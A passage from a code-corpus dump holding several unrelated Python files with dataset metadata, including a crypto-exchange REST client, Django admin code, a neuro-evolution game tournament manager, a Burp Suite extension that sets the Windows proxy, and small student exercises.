\"orders\", order, auth=True)\n return response.json()\n\n def batch_cancel(self, product_id, orders):\n response = self.request(\n \"DELETE\",\n \"orders/batch\",\n {'product_id': product_id, 'orders': orders},\n auth=True)\n return response.json()\n\n def batch_edit(self, product_id, orders):\n response = self.request(\n \"PUT\",\n \"orders/batch\",\n {'product_id': product_id, 'orders': orders},\n auth=True\n )\n return response.json()\n\n def get_orders(self, query=None):\n response = self.request(\n \"GET\",\n \"orders\",\n query=query,\n auth=True)\n return response.json()\n\n def get_L2_orders(self, product_id, auth=False):\n response = self.request(\"GET\", \"orderbook/%s/l2\" %\n product_id, auth=auth)\n return response.json()\n\n def get_ticker(self, symbol):\n response = self.request(\n \"GET\", \"/products/ticker/24hr\", query={'symbol': symbol})\n return response.json()\n\n def get_wallet(self, asset_id):\n response = self.request(\"GET\", \"wallet/balance\",\n query={'asset_id': asset_id}, auth=True)\n return response.json()\n\n def get_price_history(self, symbol, duration=5, resolution=1):\n if duration/resolution >= 500:\n raise Exception('Too many Data points')\n\n current_timestamp = time.mktime(datetime.datetime.today().timetuple())\n last_timestamp = current_timestamp - duration*60\n query = {\n 'symbol': symbol,\n 'from': last_timestamp,\n 'to': current_timestamp,\n 'resolution': resolution\n }\n\n response = self.request(\"GET\", \"chart/history\", query=query)\n return response.json()\n\n def get_price_history_by_time(self, symbol, start_time, end_time, resolution=1):\n # if duration/resolution >= 500:\n # raise Exception('Too many Data points')\n\n # current_timestamp = 
time.mktime(datetime.datetime.today().timetuple())\n # last_timestamp = current_timestamp - duration*60\n query = {\n 'symbol': symbol,\n 'from': start_time,\n 'to': end_time,\n 'resolution': resolution\n }\n\n response = self.request(\"GET\", \"chart/history\", query=query)\n return response.json()\n\n def get_mark_price(self, product_id, auth=False):\n response = self.get_L2_orders(product_id, auth=auth)\n return float(response['mark_price'])\n\n def get_leverage(self):\n raise Exception('Method not implemented')\n\n def get_position(self, product_id):\n response = self.request(\n \"GET\",\n \"positions\",\n auth=True)\n response = response.json()\n if response:\n current_position = list(\n filter(lambda x: x['product']['id'] == product_id, response))\n return current_position[0] if len(current_position) > 0 else None\n else:\n return None\n\n def set_leverage(self, product_id, leverage):\n response = self.request(\n \"POST\",\n \"orders/leverage\",\n {\n 'product_id': product_id,\n 'leverage': leverage\n },\n auth=True)\n return response.json()\n\n def change_position_margin(self, product_id, delta_margin):\n response = self.request(\n 'POST',\n 'positions/change_margin',\n {\n 'product_id': product_id,\n 'delta_margin': delta_margin\n },\n auth=True)\n return response.json()\n\n def cancel_order(self, product_id, order_id):\n order = {\n 'id': order_id,\n 'product_id': product_id\n }\n response = self.request('DELETE', \"orders\", order, auth=True).json()\n return response\n\n def place_stop_order(self, product_id, size, side, stop_price=None, limit_price=None, trail_amount=None, order_type=OrderType.LIMIT, isTrailingStopLoss=False):\n order = {\n 'product_id': product_id,\n 'size': int(size),\n 'side': side,\n 'order_type': order_type.value,\n 'stop_order_type': 'stop_loss_order',\n }\n if order_type.value == 'limit':\n if limit_price is None:\n raise Exception('limit_price is nil')\n\n order['limit_price'] = str(limit_price)\n\n if isTrailingStopLoss is True:\n if trail_amount is None:\n raise Exception('trail_amount is nil')\n order['trail_amount'] = str(\n trail_amount) if side == 'buy' else str(-1 * trail_amount)\n else:\n if stop_price is None:\n raise Exception('stop_price is nil')\n order['stop_price'] = str(stop_price)\n response = self.create_order(order)\n return response\n\n def place_bracket_order(self, product_id, size, side, limit_price=None, time_in_force=None, order_type=OrderType.LIMIT, post_only='false', client_order_id=None, take_profit_price=None, trail_amount=None):\n order = {\n 'product_id': product_id,\n 'size': int(size),\n 'side': side,\n 'order_type': order_type.value,\n 'post_only': post_only,\n \"bracket_order\": {\"stop_loss_price\": \"\", \"take_profit_price\": take_profit_price, \"trail_amount\": trail_amount}\n\n }\n print('order', order)\n if order_type.value == 'limit_order':\n order['limit_price'] = str(limit_price)\n\n if time_in_force:\n order['time_in_force'] = time_in_force.value\n\n if client_order_id:\n order['client_order_id'] = client_order_id\n\n response = self.create_order(order)\n return response\n\n def place_order(self, product_id, size, side, limit_price=None, time_in_force=None, order_type=OrderType.LIMIT, post_only='false', client_order_id=None):\n order = {\n 'product_id': product_id,\n 'size': int(size),\n 'side': side,\n 'order_type': order_type.value,\n 'post_only': post_only,\n }\n if order_type.value == 'limit_order':\n order['limit_price'] = str(limit_price)\n\n if time_in_force:\n order['time_in_force'] = 
time_in_force.value\n\n if client_order_id:\n order['client_order_id'] = client_order_id\n\n response = self.create_order(order)\n return response\n\n def get_assets(self):\n response = self.request('GET', 'assets')\n return response.json()\n\n def get_all_products(self):\n response = self.request('GET', 'products')\n return response.json()\n\n def order_history(self, page_num=1, page_size=100):\n response = self.request(\n 'GET',\n 'orders/history',\n query={\n 'page_num': page_num,\n 'page_size': page_size\n },\n auth=True\n )\n return response.json()\n\n def fills(self, page_num=1, page_size=100):\n response = self.request(\n 'GET',\n 'fills',\n query={\n 'page_num': page_num,\n 'page_size': page_size\n },\n auth=True\n )\n return response.json()\n\n\ndef create_order_format(price, size, side, product_id, post_only='false'):\n order = {\n 'product_id': product_id,\n 'limit_price': str(price),\n 'size': int(size),\n 'side': side,\n 'order_type': 'limit_order',\n 'post_only': post_only\n }\n return order\n\n\ndef cancel_order_format(x):\n order = {\n 'id': x['id'],\n 'product_id': x['product']['id']\n }\n return order\n\n\ndef round_by_tick_size(price, tick_size, floor_or_ceil=None):\n remainder = price % tick_size\n if remainder == 0:\n price = price\n if floor_or_ceil == None:\n floor_or_ceil = 'ceil' if (remainder >= tick_size / 2) else 'floor'\n if floor_or_ceil == 'ceil':\n price = price - remainder + tick_size\n else:\n price = price - remainder\n number_of_decimals = len(\n format(Decimal(repr(float(tick_size))), 'f').split('.')[1])\n price = round(Decimal(price), number_of_decimals)\n return price\n\n\ndef generate_signature(secret, message):\n message = bytes(message, 'utf-8')\n secret = bytes(secret, 'utf-8')\n hash = hmac.new(secret, message, hashlib.sha256)\n return hash.hexdigest()\n\n\ndef get_time_stamp():\n d = datetime.datetime.utcnow()\n epoch = datetime.datetime(1970, 1, 1)\n return str(int((d - epoch).total_seconds()))\n\n\ndef query_string(query):\n if query == None:\n return ''\n else:\n query_strings = []\n for key, value in query.items():\n query_strings.append(key + '=' + str(value))\n return '?' 
+ '&'.join(query_strings)\n\n\ndef body_string(body):\n if body == None:\n return ''\n else:\n return json.dumps(body, separators=(',', ':'))\n","sub_path":"delta_history/delta/delta_rest_client.py","file_name":"delta_rest_client.py","file_ext":"py","file_size_in_byte":11379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"312606210","text":"from django.contrib import admin, message\nfrom django.utils.translation import gettext, gettext_lazy as _\nfrom django.conf import settings\nfrom ..models import ReadLine\nfrom django.core.mail import send_mail\n\nclass ReadLineAdmin(admin.ModelAdmin):\n fieldsets = [\n (None, {'fields': ('name', 'factory')}),\n ]\n\n exclude = ['last_login']\n\n list_display = ['name', 'factory', 'company', 'login_at', 'cloudkey']\n\n list_filter = [\n ('factory__company', admin.RelatedOnlyFieldListFilter),\n ('factory', admin.RelatedOnlyFieldListFilter)\n ]\n\n def getBody(self, queryset):\n s = \"\"\n for e in queryset:\n s += 'Reading Line: '+e.name+ ', Cloudkey: '+e.cloudkey+'\\n'\n return s\n \n def send_email(self, request, queryset):\n subject = 'CloudKey Change'\n message = self.getBody(queryset)\n email_from = settings.EMAIL_HOST_USER\n recipient_list = [request.user.email, ]\n \n try:\n send_mail(subject, message, email_from, recipient_list)\n self.message_user(request, f'An email to {request.user.email} has been successfully sent')\n except: #SMTPAuthenticationError\n self.message_user(request, 'There was a problem sending the email, contact with the Administrator', level=messages.ERROR)\n \n send_email.short_description = \"Send CloudKey to my email\"\n actions = [send_email]\n\n ## Overriden methods\n def get_readonly_fields(self, request, obj=None):\n ret = []\n # Set readonly when object is already created\n if obj is not None:\n ret.extend(['factory'])\n return ret\n\n def get_formsets_with_inlines(self, request, obj=None):\n for inline in self.get_inline_instances(request, obj):\n # Hide inlines on add\n if obj is not None:\n yield inline.get_formset(request, obj), inline\n\n def company(self, obj):\n return obj.factory.company\n\n\nclass ReadLineInline(admin.TabularInline):\n model = ReadLine\n extra = 0\n can_delete = False\n readonly_fields = ['name', 'login_at']\n exclude = ['cloudkey', 'stationid']\n\n ## Overriden methods\n def has_add_permission(self, request, obj):\n return False\n","sub_path":"Cloud/web/partners/admin/readline.py","file_name":"readline.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"135150013","text":"class Asset:\n def __init__(self, tag, mac, sn, mn, owner):\n self.AssetTag = tag\n self.MacAddress = mac\n self.SerialNumber = sn\n self.ModelNumber = mn\n self.Owner = owner\n\n def toString(self):\n rtnStr = \"{0}\\n\\tSerial Number: {1}\\n\\tModel Number: {2}\\n\\tMac Address: {3}\\n\\tOwner: {4}\"\n return rtnStr.format(self.AssetTag, self.SerialNumber, self.ModelNumber, self.MacAddress, self.Owner)\n\n","sub_path":"Week 08/AssetTracking/AssetTracking/Asset.py","file_name":"Asset.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"112891862","text":"trans = {'0':'ling', '1':'yi', '2':'er', '3':'san', '4': 'si', '5':'wu', \n '6':'liu', '7':'qi', '8':'ba', '9':'jiu', '10': 'shi', '100': 'bai'}\n\n\n\ndef speak_Chinese(number):\n if number != int(number) or not 
0<=int(number)<=999:\n print('无效号码。 请输入0到999之间的整数.')\n else: \n intnumber = number\n number = str(number)\n if 0<=intnumber<=10:\n return trans[number]\n if 11<=intnumber<=19:\n return '{} {}'.format(trans['10'],trans[number[1]])\n if 20<=intnumber<=99:\n if number[1] == '0':\n return '{} {}'.format(trans[number[0]],trans['10']) \n else:\n return '{} {} {}'.format(trans[number[0]],trans['10'],trans[number[1]])\n if 100<=intnumber<=999:\n if number[1]=='0' and number[2]!='0':\n return '{} {} {} {}'.format(trans[number[0]],trans['100'],trans['0'],trans[number[2]])\n if number[2]=='0' and number[1]!='0':\n return '{} {} {} {}'.format(trans[number[0]],trans['100'],trans[number[1]],trans['10'])\n if number[1]=='0' and number[2]=='0':\n return '{} {} '.format(trans[number[0]],trans['100'])\n else:\n return '{} {} {} {} {}'.format(trans[number[0]],trans['100'],trans[number[1]],trans['10'], trans[number[2]])\n# For testing\ndef main():\n print(speak_Chinese(36))\n print('In Chinese: 36 = san shi liu')\n print(speak_Chinese(20))\n print('In Chinese: 20 = er shi')\n print(speak_Chinese(16))\n print('In Chinese: 16 = shi liu')\n print(speak_Chinese(200))\n print('In Chinese: 200 = er bai')\n print(speak_Chinese(109))\n print('In Chinese: 109 = yi bai ling jiu')\n print(speak_Chinese(999))\n print('In Chinese: 999 = jiu bai jiu shi jiu')\n\nif __name__ == '__main__':\n main()\n","sub_path":"exam_p1.py","file_name":"exam_p1.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"47608199","text":"from PIL import Image, ImageDraw, ImageFont, ImageFilter, ImageOps\nfrom plugins import resources, tarot, playing\n\n\ndef concat(image_list):\n widths, heights = zip(*( img.size for img in image_list))\n width = sum(widths)\n height = max(heights)\n\n canvas = Image.new('RGBA', (width, height), (255,255,255,0))\n offset = 0\n for image in image_list:\n canvas.paste(image, (offset, 0))\n offset += image.size[0]\n return canvas\n\ndef margin(image, size):\n canvas = Image.new('RGBA', tuple([ o + m * 2 for o, m in zip(image.size, size) ]), (255, 255, 255, 0))\n canvas.paste(image, size)\n return canvas\n\ndef set_size(image, size):\n canvas = Image.new('RGBA', size, (255, 255, 255, 0))\n canvas.paste(image, tuple([ (c - o) // 2 for o, c in zip(image.size, size) ]))\n return canvas\n\ndef bgcolor(image, color):\n canvas = Image.new('RGBA', image.size, color)\n canvas = Image.alpha_composite(canvas, image)\n return canvas\n\ndef text_at_center(canvas, text, fontfile='materials/font.otf', fontsize=18):\n image_w, image_h = canvas.size[0] * 4, canvas.size[1] * 4\n image = Image.new('RGBA', (image_w, image_h), (255,255,255,0))\n draw = ImageDraw.Draw(image)\n\n draw.font = ImageFont.truetype(fontfile, fontsize * 4)\n lines = text.splitlines()\n ws, hs = [s for s in zip(*[draw.font.getsize(line) for line in lines])]\n text_w, text_h = max(ws), sum(hs)\n\n for row,line in enumerate(lines):\n position = (image_w - ws[row])/2, (image_h - text_h)/2 + hs[row] * row\n draw.text(position, line, (0, 0, 0, 255))\n\n img = image.resize((image_w//4, image_h//4), Image.ANTIALIAS)\n canvas.paste(img, (0,0))\n return canvas\n\n\ndef dropshadow(image, border=5):\n img = ImageOps.invert(image.split()[3]).convert(\"RGBA\")\n img = margin(img, (border, border))\n for n in range(3):\n img = img.filter(ImageFilter.BLUR)\n img = Image.alpha_composite(img, margin(image, (border,border)))\n return img\n\ndef create_single_tarot_image(card, 
text=None):\n fontsize = 18 if isinstance(card, tarot.MinorArcana) else 16\n image = concat([resources.tarot_blank, resources.tarot_blank])\n image = text_at_center(image, text or card.info_rows, fontsize=fontsize)\n image = set_size(image, (160, 150))\n image = concat([dropshadow(card.image), image])\n image = bgcolor(set_size(image, resources.canvas_size), resources.bg_color)\n return image\n\ndef create_triple_tarot_image(cards):\n image = dropshadow(concat([card.image for card in cards]))\n image = bgcolor(set_size(image, resources.canvas_size), resources.bg_color)\n return image\n\ndef create_playing_card_image(cards):\n image = concat([card.image for card in playing.Deck.sort(cards)])\n image = set_size(image, (420, 280))\n image = bgcolor(image, (38, 75, 31))\n return image\n\n","sub_path":"plugins/images.py","file_name":"images.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"418504134","text":"import pandas as pd \r\nimport random\r\nimport statistics\r\nimport csv\r\nimport plotly.figure_factory as ff \r\nimport plotly.graph_objects as go \r\ndf=pd.read_csv('medium_data.csv')\r\ndata=df['Math_score'].tolist()\r\nmean=statistics.mean(data)\r\nstd=statistics.stdev(data)\r\n\r\ndef randomSetOfMeans(counter):\r\n dataSet=[]\r\n for i in range(0,counter):\r\n randomIndex=random.randint(0,len(data)-1)\r\n value=data[randomIndex]\r\n dataSet.append(value)\r\n mean=statistics.mean(dataSet)\r\n return mean\r\n\r\nmeanList=[]\r\nfor i in range(0,1000):\r\n setOfMeans=randomSetOfMeans(100)\r\n meanList.append(setOfMeans)\r\nm1=statistics.mean(meanList)\r\ns1=statistics.stdev(meanList)\r\nprint(m1,s1)\r\n\r\n\r\nfsds,fsde=m1-s1,m1+s1\r\nssds,ssde=m1-2*s1,m1+2*s1\r\ntsds,tsde=m1-3*s1,m1+3*s1\r\ndf=pd.read_csv('data3.csv')\r\ndata=df['Math_score'].tolist()\r\nmean=statistics.mean(data)\r\nstd=statistics.stdev(data)\r\nfig=ff.create_distplot([meanList],['Student Marks'],show_hist=False)\r\nfig.add_trace(go.Scatter(x=[m1,m1],y=[0,0.17],mode='lines',name='mean'))\r\nfig.add_trace(go.Scatter(x=[mean,mean],y=[0,0.17],mode='lines',name='mean'))\r\nfig.add_trace(go.Scatter(x=[ssde,ssde],y=[0,0.17],mode='lines',name='stdev2end'))\r\nfig.add_trace(go.Scatter(x=[tsde,tsde],y=[0,0.17],mode='lines',name='stdev3end'))\r\nfig.show()\r\nzscore=(mean-m1)/std\r\nprint(zscore)\r\n","sub_path":"Project111.py","file_name":"Project111.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"451202353","text":"\nfrom datetime import datetime, timedelta\nimport pandas as pd\nimport numpy as np\nfrom ipdb import set_trace\n\n#print(pd.Timestamp(datetime.today()).strftime('%Y-%m-%d'))\n\n\n\nt = pd.DataFrame()\nt['a'] = [1,2,6,2,3,6,1,4]\nt['b'] = [3,4,5,2,3,4,4,5]\nt = t.groupby('a')\nt = t.get_group(1)\nprint(t)\nset_trace()\nprint(t.std()['a'])\n#t = np.matrix([[1,2,3],[1,2,3],[2,3,4],[3,6,7]])\nt = np.matrix(t)\nprint(np.shape(t))\nprint(np.cov(t.T))\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"59099561","text":"import argparse\n\nfrom keras.models import load_model\nimport pickle\nimport threading\nfrom time import sleep\nimport os\n\nfrom predictPlayNN import connectAndPlay\nfrom championship_manager import Championship\nfrom neuro_evolution.genetic_algorithm import evolve\n\n\ndef 
loadModels(folder, generation, playersNumber):\n # blackModel = {\"id\": (from, to), ...}\n blackModel = {}\n whiteModel = {}\n\n genStr = str(generation)\n\n for i in range(playersNumber):\n blackModel[genStr + \"_\" + str(i)] = (\n load_model(folder + genStr + \"/black/modelFB_\" + genStr + \"_\" + str(i), compile=False),\n load_model(folder + genStr + \"/black/modelTB_\" + genStr + \"_\" + str(i), compile=False)\n )\n whiteModel[genStr + \"_\" + str(i)] = (\n load_model(folder + genStr + \"/white/modelFW_\" + genStr + \"_\" + str(i), compile=False),\n load_model(folder + genStr + \"/white/modelTW_\" + genStr + \"_\" + str(i), compile=False)\n )\n\n # model.predict() is not thread safe, so we have to compute the predict function here before creating threads\n for k in blackModel.keys():\n blackModel[k][0]._make_predict_function()\n blackModel[k][1]._make_predict_function()\n for k in whiteModel.keys():\n whiteModel[k][0]._make_predict_function()\n whiteModel[k][1]._make_predict_function()\n\n return blackModel, whiteModel\n\n\ndef loadLabels(folder):\n blackLabel = []\n whiteLabel = []\n\n blackLabel.append(pickle.loads(open(folder + \"label/labelFB\", \"rb\").read()))\n blackLabel.append(pickle.loads(open(folder + \"label/labelTB\", \"rb\").read()))\n\n whiteLabel.append(pickle.loads(open(folder + \"label/labelFW\", \"rb\").read()))\n whiteLabel.append(pickle.loads(open(folder + \"label/labelTW\", \"rb\").read()))\n\n return blackLabel, whiteLabel\n\n\ndef saveReport(folder, championship, generationNumber):\n with open(folder + \"report/report_\" + str(generationNumber) + \".txt\", \"w\") as reportFile:\n reportFile.write(\"Black with points:\\n\")\n # print also baseline scores\n champ = championship.black_with_points(False, \"baseline_net\")\n sortedChamp = sorted(champ.items(), key=lambda kv: kv[1], reverse=True)\n details = championship.black_with_score()\n i = 1\n for net in sortedChamp:\n reportFile.write(str(i) + \") \" + net[0] + \" \" + str(net[1]) + \" \" + str(details[net[0]]) + \"\\n\")\n i += 1\n\n reportFile.write(\"\\nWhite with points:\\n\")\n # print also baseline scores\n champ = championship.white_with_points(False, \"baseline_net\")\n sortedChamp = sorted(champ.items(), key=lambda kv: kv[1], reverse=True)\n details = championship.white_with_score()\n i = 1\n for net in sortedChamp:\n reportFile.write(str(i) + \") \" + net[0] + \" \" + str(net[1]) + \" \" + str(details[net[0]]) + \"\\n\")\n i += 1\n\n\ndef waitForThreads():\n mainThread = threading.currentThread()\n for t in threading.enumerate():\n if t is not mainThread:\n t.join()\n\n\ndef saveModels(folder, generation, blackNewModel, whiteNewModel):\n for k in blackNewModel.keys():\n blackNewModel[k][0].save(folder + str(generation) + \"/black/modelFB_\" + k)\n blackNewModel[k][1].save(folder + str(generation) + \"/black/modelTB_\" + k)\n\n for k in whiteNewModel.keys():\n whiteNewModel[k][0].save(folder + str(generation) + \"/white/modelFW_\" + k)\n whiteNewModel[k][1].save(folder + str(generation) + \"/white/modelTW_\" + k)\n\n\n# construct the argument parser and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-sgn\", \"--starting-generation-number\", required=True,\n help=\"the number of the first generation to consider\")\nap.add_argument(\"-nf\", \"--net-folder\", required=True,\n help=\"the folder containing the nets divided by generation number\")\nap.add_argument(\"-pn\", \"--players-number\", required=True, help=\"the number of players (nets) for every 
generation\")\nap.add_argument(\"-gn\", \"--generation-number\", required=True, help=\"how many generations have to be computed\")\n\nap.add_argument(\"-b\", \"--baseline\", required=True, help=\"1: use baseline championship, 0: use network championship\")\n# more arguments needed?\nargs = vars(ap.parse_args())\n\n# folder hierarchy:\n# neuralNetworks\n# labels\n# labelFB\n# labelTB\n# labelFW\n# labelTW\n# 0\n# black\n# modelFB_0_0\n# modelTB_0_0\n# ...\n# modelFB_0_49\n# modelTB_0_49\n# white\n# modelFW_0_0\n# ...\n# modelTW_0_49\n# 1\n# ...\n# ...\n# n\n# ...\n\nWHITEPORT = 5800\nBLACKPORT = 5801\n\nCROSSOVERRATE = 0.01\nMUTATIONRATE_INDIVIDUALS = 0.5\nMUTATIONRATE_NEURONS = 0.005\n\nfolder = args[\"net_folder\"]\nif folder[-1] != \"/\":\n folder += \"/\"\n\nstartingGenerationNumber = int(args[\"starting_generation_number\"])\nplayersNumber = int(args[\"players_number\"])\n\ngenerationNumber = int(args[\"generation_number\"])\n\n# load neural networks from the folder provided\nprint(\"[INFO] loading networks and label binarizers...\")\nblackModel, whiteModel = loadModels(folder, startingGenerationNumber, playersNumber)\nblackLabel, whiteLabel = loadLabels(folder)\n\nfor g in range(startingGenerationNumber, startingGenerationNumber + generationNumber):\n print(\"[INFO] generation number \" + str(g))\n\n # generate championship for this generation\n championship = Championship([str(g) + \"_\" + str(i) for i in range(playersNumber)])\n\n # matches: [(white player, black player), ...]\n # in this case: [('1_0', '1_29'), ('1_1', '1_28') ... ]\n matches = championship.all_matches()\n\n ##########################################################################\n # These lines are needed to reduce number of concurrent thread\n # if 'limited_match_per_time' all threads will start to execute asap\n limited_match_per_time = False\n # len(matches) = n ** 2, match_per_time >= 1 (at least 1 match)\n # match_per_time = sqrt(len(matches))\n match_per_time = 900\n num_current_match = 1\n ##########################################################################\n ##########################################################################\n # These lines are needed to manage the baseline player, which will be the\n # last player in the list, to do not create issues in the evolution step\n USE_BASELINE = int(args[\"baseline\"])\n # folder that contains moves that makes baseline lose against a net\n if USE_BASELINE and not os.path.isdir(folder + 'baseline_defeated_by/'):\n os.makedirs(folder + 'baseline_defeated_by/')\n baseline_net = '_' + str(playersNumber - 1)\n # remove all matches where the baseline does not play, and where both are baseline\n if USE_BASELINE:\n matches = [match\n for match in matches\n if (match[0][-len(baseline_net):] == baseline_net or match[1][-len(baseline_net):] == baseline_net)\n and not (match[0][-len(baseline_net):] == baseline_net\n and match[1][-len(baseline_net):] == baseline_net)]\n matches *= 5\n ##########################################################################\n\n # lock to correctly use Theano\n lock = threading.Lock()\n\n print(\"[INFO] playing \" + str(len(matches)) + \" matches...\")\n\n for m in matches:\n # white player created\n whitePlayer = m[0]\n baseline_player = False\n if USE_BASELINE and whitePlayer[-len(baseline_net):] == baseline_net:\n baseline_player = True\n modelFrom = whiteModel[whitePlayer][0]\n modelTo = whiteModel[whitePlayer][1]\n\n whiteThreadPlay = threading.Thread(target=connectAndPlay, args=(\n modelFrom, modelTo, whiteLabel[0], 
whiteLabel[1], whitePlayer, \"W\", WHITEPORT, championship, lock,\n baseline_player, folder + 'baseline_defeated_by/', m[1]))\n whiteThreadPlay.start()\n\n # black player created\n blackPlayer = m[1]\n baseline_player = False\n if USE_BASELINE and blackPlayer[-len(baseline_net):] == baseline_net:\n baseline_player = True\n modelFrom = blackModel[blackPlayer][0]\n modelTo = blackModel[blackPlayer][1]\n\n blackThreadPlay = threading.Thread(target=connectAndPlay, args=(\n modelFrom, modelTo, blackLabel[0], blackLabel[1], blackPlayer, \"B\", BLACKPORT, championship, lock,\n baseline_player, folder + 'baseline_defeated_by/', m[0]))\n blackThreadPlay.start()\n\n if limited_match_per_time:\n print(\"started match number: \" + str(num_current_match))\n if num_current_match % match_per_time == 0 or num_current_match == len(matches) - 1:\n waitForThreads()\n else:\n sleep(0.5)\n num_current_match += 1\n else:\n sleep(0.5)\n\n if not limited_match_per_time:\n waitForThreads()\n\n # print report\n saveReport(folder, championship, g)\n\n # evolution of the networks\n print(\"[INFO] evolving networks...\")\n\n blackNextGeneration = []\n if USE_BASELINE:\n blackModel = {key: value for key, value in blackModel.items() if key[-len(baseline_net):] != baseline_net}\n print(\"[INFO] evolving \" + str(len(blackModel.keys())) + \" nets ...\")\n blackThreadEvolve = threading.Thread(target=evolve, args=(\n blackModel, championship.black_with_points(USE_BASELINE, baseline_net), playersNumber // 10, CROSSOVERRATE,\n MUTATIONRATE_INDIVIDUALS, MUTATIONRATE_NEURONS, blackNextGeneration, lock, USE_BASELINE))\n blackThreadEvolve.start()\n\n whiteNextGeneration = []\n if USE_BASELINE:\n whiteModel = {key: value for key, value in whiteModel.items() if key[-len(baseline_net):] != baseline_net}\n whiteThreadEvolve = threading.Thread(target=evolve, args=(\n whiteModel, championship.white_with_points(USE_BASELINE, baseline_net), playersNumber // 10, CROSSOVERRATE,\n MUTATIONRATE_INDIVIDUALS, MUTATIONRATE_NEURONS, whiteNextGeneration, lock, USE_BASELINE))\n whiteThreadEvolve.start()\n\n waitForThreads()\n\n # cleaning previous loaded models\n blackModel.clear()\n for i in range(playersNumber):\n blackModel[str(g + 1) + \"_\" + str(i)] = (blackNextGeneration[i][0], blackNextGeneration[i][1])\n\n whiteModel.clear()\n for i in range(playersNumber):\n whiteModel[str(g + 1) + \"_\" + str(i)] = (whiteNextGeneration[i][0], whiteNextGeneration[i][1])\n\n # create new directories for the mutated neural networks\n os.makedirs(folder + str(g + 1) + \"/black/\")\n os.makedirs(folder + str(g + 1) + \"/white/\")\n\n print(\"[INFO] saving evolved networks...\")\n saveModelsThread = threading.Thread(target=saveModels, args=(folder, g + 1, blackModel, whiteModel))\n saveModelsThread.start()\n","sub_path":"src/evolution_manager.py","file_name":"evolution_manager.py","file_ext":"py","file_size_in_byte":10878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"505901468","text":"from javax.swing import JPanel, JTextField, JButton, JLabel, BoxLayout\r\nfrom burp import IBurpExtender, ITab\r\n\r\nimport ctypes \r\nimport subprocess\r\n\r\nclass BurpExtender(IBurpExtender, ITab):\r\n def registerExtenderCallbacks(self, callbacks):\r\n self.callbacks = callbacks\r\n self.isEnabled = False\r\n callbacks.setExtensionName('app-traffic')\r\n callbacks.addSuiteTab(self)\r\n # Called on \"Enable\" button click to spin up the API Gateway\r\n def enableGateway(self, event):\r\n self.isEnabled = True\r\n 
self.set_sys_proxy(True)\r\n self.enable_button.setEnabled(False)\r\n self.target_host.setEnabled(False)\r\n self.disable_button.setEnabled(True)\r\n return\r\n # Called on \"Disable\" button click to delete API Gateway\r\n def disableGateway(self, event):\r\n self.isEnabled = False\r\n self.set_sys_proxy(False)\r\n self.enable_button.setEnabled(True)\r\n self.target_host.setEnabled(True)\r\n self.disable_button.setEnabled(False)\r\n return\r\n # Tab name\r\n def getTabCaption(self):\r\n return 'app-traffic'\r\n def set_key(self, ip, value): \r\n subprocess.Popen('taskkill /f /im iexplore.exe >nul 2>&1', shell=True)\r\n subprocess.Popen('reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyServer /d \"'+str(ip)+'\" /f', shell=True)\r\n subprocess.Popen('reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyEnable /t REG_DWORD /d '+str(value)+' /f', shell=True)\r\n subprocess.Popen('ping -n 5 127.0.0.1 >nul', shell=True)\r\n subprocess.Popen('start iexplore.exe http://burp', shell=True)\r\n\r\n def set_sys_proxy(self,on_off):\r\n if on_off:\r\n self.set_key(self.target_host.text, 1) \r\n else:\r\n self.set_key('', 0) \r\n # Layout the UI\r\n def getUiComponent(self):\r\n self.panel = JPanel()\r\n self.main = JPanel()\r\n self.main.setLayout(BoxLayout(self.main, BoxLayout.Y_AXIS))\r\n self.target_host_panel = JPanel()\r\n self.main.add(self.target_host_panel)\r\n self.target_host_panel.setLayout(\r\n BoxLayout(self.target_host_panel, BoxLayout.X_AXIS))\r\n self.target_host_panel.add(JLabel('Listen Prot:'))\r\n self.target_host = JTextField('127.0.0.1:8080', 25)\r\n self.target_host_panel.add(self.target_host)\r\n self.buttons_panel = JPanel()\r\n self.main.add(self.buttons_panel)\r\n self.buttons_panel.setLayout(\r\n BoxLayout(self.buttons_panel, BoxLayout.X_AXIS))\r\n self.enable_button = JButton('Enable', actionPerformed= self.enableGateway)\r\n self.buttons_panel.add(self.enable_button)\r\n self.disable_button = JButton('Disable', actionPerformed= self.disableGateway)\r\n self.buttons_panel.add(self.disable_button)\r\n self.disable_button.setEnabled(False)\r\n self.panel.add(self.main)\r\n return self.panel\r\n","sub_path":"app-traffic.py","file_name":"app-traffic.py","file_ext":"py","file_size_in_byte":3002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"576822574","text":"from collections import deque\n\npeople = deque()\ncommand = input()\nwhile not command == \"End\":\n if command == \"Paid\":\n while len(people) > 0:\n print(people.popleft())\n\n else:\n name = command\n people.append(name)\n command = input()\n\nprint(f\"{len(people)} people remaining.\")\n\n","sub_path":"advanced/stacks and queues/supermarket.py","file_name":"supermarket.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"563492641","text":"cats = []\nwhile True:\n print('Gimme a name for cat ' + str(len(cats) + 1) + ' , then press Enter. 
